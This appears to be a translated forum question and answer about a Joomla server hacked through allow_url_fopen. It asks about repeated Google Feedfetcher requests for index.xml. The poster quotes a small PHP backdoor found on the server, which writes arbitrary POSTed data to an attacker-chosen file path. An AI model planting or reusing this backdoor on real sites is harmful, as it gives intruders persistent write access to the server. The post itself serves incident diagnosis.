Hacking
不斷有人請求 index.xml
我的伺服器最近由於 Joomla 和 allow_url_fopen = ON 而遭到入侵
Restricted accoss <?php error_reporting(0); ini_set("max_execution_time",0); ini_set("default_socket_timeout", 2); ob_implicit_flush (1); $file = "".$_POST["path"]; $fh = fopen ($file, 'w') or die(""); echo fwrite ($fh, stripslashes($_POST["raw_data"])); fclose($fh);
所以我關閉了 allow_url_fopen 並刪除了所有這些文件。現在,我的網站在幾分鐘內執行良好,但每隔幾秒鐘就會向該地址發出請求,並在 error_log 中提供此消息
[Thu Mar 07 00:14:00 2013] [error] [client 74.125.185.16] File does not exist: /var/www/html/index.xml
我在 access_log 中看到了很多時間
74.125.179.86 - - [07/Mar/2013:00:15:39 +0000] "GET /index.xml HTTP/1.1" 404 293 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+google.com/feedfetcher.html)";
那麼正常嗎?
看起來有人在濫用 Google App Engine。檢查您的 Apache 訪問日誌以獲取該 IP 地址,並且使用者代理字元串應具有其應用程序 ID。然後,您可以向 Google 報告濫用行為。